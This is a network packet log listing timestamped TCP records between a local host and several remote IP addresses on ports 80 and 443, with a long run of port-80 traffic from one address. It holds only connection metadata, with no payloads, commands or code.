Dec 8, 2024 19:52:14.094685078 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.094695091 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.107388020 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.107475996 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.107485056 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.121503115 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.121947050 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.121963024 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.134773970 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.136149883 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.136162043 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.147622108 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.150085926 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.150100946 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.178916931 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.182504892 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.182584047 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.182595015 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.186495066 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.186502934 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.188829899 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.190510988 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.190519094 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.238334894 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.248924017 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.252001047 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.254733086 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.254749060 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.261373043 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.261409044 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.261493921 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.261508942 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.261559010 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.267995119 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.273670912 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.273765087 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.273969889 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.273979902 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.274034977 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.285321951 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.297014952 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.298535109 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.298544884 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.308794022 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.308830976 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.308921099 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.308929920 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.308976889 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.320348024 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.331044912 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.331114054 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.331202030 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.331211090 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.331259012 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.341819048 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.352710009 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.352807999 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.352890968 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.352901936 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.352948904 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.363179922 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.373444080 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.373573065 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.373646975 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.373656034 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.373703003 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.383363962 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.392673016 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.392772913 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.392843008 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.392853022 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.392898083 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.401716948 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.410303116 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.410346985 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.410418034 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.410428047 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.410473108 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.418989897 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.427712917 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.427824020 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.427912951 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.427923918 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.427969933 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.429604053 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.439917088 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.440660000 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.440675020 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.446521997 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.450515985 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.450536966 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.450547934 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.450623989 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.451921940 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.462707043 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.463243008 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.463304043 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.463318110 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.463366032 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.466186047 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.469516039 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.470510960 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.470519066 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.475054979 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.478583097 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.478590965 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.480477095 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.482497931 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.482506037 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.486064911 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.486521959 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.486531019 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.491203070 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.494522095 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.494529963 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.496565104 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.498492956 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.498500109 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.499258041 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.502721071 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.502727985 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.507044077 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.510508060 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.510631084 CET	49736	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.510648966 CET	443	49736	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.615140915 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.615186930 CET	443	49742	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:14.615295887 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.615513086 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:14.615525961 CET	443	49742	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:16.221970081 CET	49730	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:16.221973896 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:16.317703962 CET	443	49742	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:16.318047047 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:16.318090916 CET	443	49742	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:16.318416119 CET	443	49742	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:16.318977118 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:16.319044113 CET	443	49742	216.58.208.228	192.168.2.4
Dec 8, 2024 19:52:16.341810942 CET	80	49730	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:16.341834068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:16.342165947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:16.342463017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:16.366475105 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:16.462660074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:16.495727062 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:16.495776892 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:16.496217966 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:16.506241083 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:16.506262064 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:18.180409908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:18.180497885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:18.226073027 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:18.226142883 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:18.252275944 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:18.252291918 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:18.252650976 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:18.300468922 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:18.424189091 CET	49742	443	192.168.2.4	216.58.208.228
Dec 8, 2024 19:52:18.819797993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:18.819844007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:18.939121962 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:18.939163923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:18.939229965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:19.736391068 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:19.783334970 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:19.874952078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:19.875017881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:19.910602093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:20.030260086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:20.278822899 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.278845072 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.278853893 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.278862953 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.278892994 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.278923035 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:20.278945923 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.278959036 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:20.278990030 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:20.305819988 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.305902958 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:20.305916071 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.305927038 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:20.306013107 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:20.851278067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:20.852545023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:21.406533003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:21.551753044 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:21.551774025 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:21.551791906 CET	49749	443	192.168.2.4	20.109.210.53
Dec 8, 2024 19:52:21.551798105 CET	443	49749	20.109.210.53	192.168.2.4
Dec 8, 2024 19:52:21.706718922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:21.750325918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:21.827200890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:22.611049891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:22.611119986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:22.940967083 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.063661098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.380896091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.380994081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.381036043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.381063938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.381074905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.381087065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.381089926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.381098986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.381109953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.381112099 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.381154060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.389795065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.389867067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.389950991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.389991045 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.398452997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.398466110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.398519039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.406635046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.406698942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.505980015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.506057978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.506058931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.506089926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.573340893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.573391914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.573420048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.573460102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.577318907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.577369928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.577392101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.577404976 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.583738089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.583796024 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.583877087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.583928108 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.592394114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.592454910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.592535019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.592578888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.600761890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.600822926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.600838900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.600878954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.609019995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.609091997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.609174967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.609214067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.617535114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.617594957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.617660999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.617702007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.625984907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.626080990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.626108885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.626144886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.634450912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.634519100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.634599924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.634645939 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.643028975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.643106937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.643120050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.643143892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.651326895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.651387930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.651406050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.651443005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.663187981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.663242102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.697814941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.697875023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.697957993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.697997093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.701993942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.702047110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.764846087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.764909983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.764935970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.764975071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.768594980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.768655062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.769973040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.770020008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.770142078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.770176888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.774416924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.774475098 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.774507999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.774547100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.781929016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.781979084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.782035112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.782075882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.789519072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.789623022 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.789828062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.789880991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.794070005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.794111013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.794167042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.794243097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.798762083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.798834085 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.798867941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.798901081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.803307056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.803349018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.803402901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.803436995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.807996988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.808053017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.808151007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.808192015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.812704086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.812756062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.812791109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.812828064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.817401886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.817455053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.817472935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.817514896 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.821844101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.821890116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.821955919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.821996927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.826653957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.826706886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.826738119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.826769114 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.831430912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.831485987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.831593990 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.831631899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.835105896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.835170031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.835175037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.835221052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.839066982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.839121103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.839154959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:23.839191914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:23.843003988 CET	80	49748	185.215.113.206	192.168.2.4
